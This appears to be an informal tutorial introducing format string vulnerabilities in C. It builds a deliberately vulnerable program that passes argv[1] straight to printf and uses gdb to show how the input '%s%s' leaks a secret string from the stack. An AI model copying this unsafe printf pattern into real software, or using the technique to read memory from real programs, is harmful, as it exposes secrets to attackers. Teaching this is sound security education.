Format strings are the strings mainly associated with printf's set of instructions (like printf,fprintf etc..) which basically stands for print format.... These functions accept several arguments and put them on the stack..and as a format specifier is noted in the string the function pops the data from the stack and shows it at that position....eg:- In the following call Code: printf(“Aneesh is %s”,string) The stack would look like Code: ========== Aneesh is %s ========== string ========== Other variables ========== garbage ========= SO what the function basically does is that as it finds a format string specifier it just simply pops the value from the stack and display's us in the format we specified.. This intern is a vulnerability if not used properly.. Format String Vulnerabilities In this article we'll be only looking at basic format string vulnerabilities ... We'll only be covering how to read data of the stack... The vulnerable program we are using :- format.c Code: #include<stdio.h> int main(int argc,char *argv[]) { char pass[] = "I am a secret .... Please dont print me..!!\n"; printf(argv[1]); return(0); } Compiling :- Code: aneesh@aneesh-laptop:~/articles/C$ gcc format.c -o format -ggdb -fno-stack-protector format.c: In function ‘main’: format.c:6: warning: format not a string literal and no format arguments GCC being very intelligent tells us not to use this....but then also there are some softwares that contain these kind of vulnerabilities... Now lets run the program with basic format string :- Code: aneesh@aneesh-laptop:~/articles/C$ ./format Hello Helloaneesh@aneesh-laptop:~/articles/C$ It simply prints out hello... Now lets open the app in gdb and examine the stack... Code: aneesh@aneesh-laptop:~/articles/C$ gdb ./format GNU gdb (GDB) 7.1-ubuntu Copyright (C) 2010 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "i486-linux-gnu". For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>... Reading symbols from /home/aneesh/articles/C/format...done. (gdb) List the program Code: (gdb) list 1 #include<stdio.h> 2 3 int main(int argc,char *argv[]) 4 { 5 char pass[] = "I am a secret .... Please dont print me..!!\n"; 6 printf(argv[1]); 7 return(0); 8 } (gdb) Place a break point at the start of main Code: (gdb) break main Breakpoint 1 at 0x80483ed: file format.c, line 5. Run the program with some sample string... Code: (gdb) run hello Starting program: /home/aneesh/articles/C/format hello Breakpoint 1, main (argc=2, argv=0xbffff4e4) at format.c:5 5 char pass[] = "I am a secret .... Please dont print me..!!\n"; (gdb) s 6 printf(argv[1]); (gdb) Examine the data at the stack Code: (gdb) x/2s $esp 0xbffff3f0: "\364?(" 0xbffff3f4: "\364\237\004\b\b\364\377\277\350\202\004\b0\340\021I am a secret .... Please dont print me..!!\n" We notice that we can read the contents of the secret by popping the stack 2 times with %s Lets do this and check our solution... Code: (gdb) run %s%s Starting program: /home/aneesh/articles/C/format %s%s Breakpoint 1, main (argc=2, argv=0xbffff4f4) at format.c:5 5 char pass[] = "I am a secret .... Please dont print me..!!\n"; (gdb) s 6 printf(argv[1]); (gdb) s ???#a secret .... Please dont print me..!! 7 return(0); Boom we printed the secret... Thats all for this tutorial may be i'll write some more on format string ... like reading memory from desired address...
Thanks for accepting.. The best the viewers can do is to post some comments...as feedback... Really need them!!!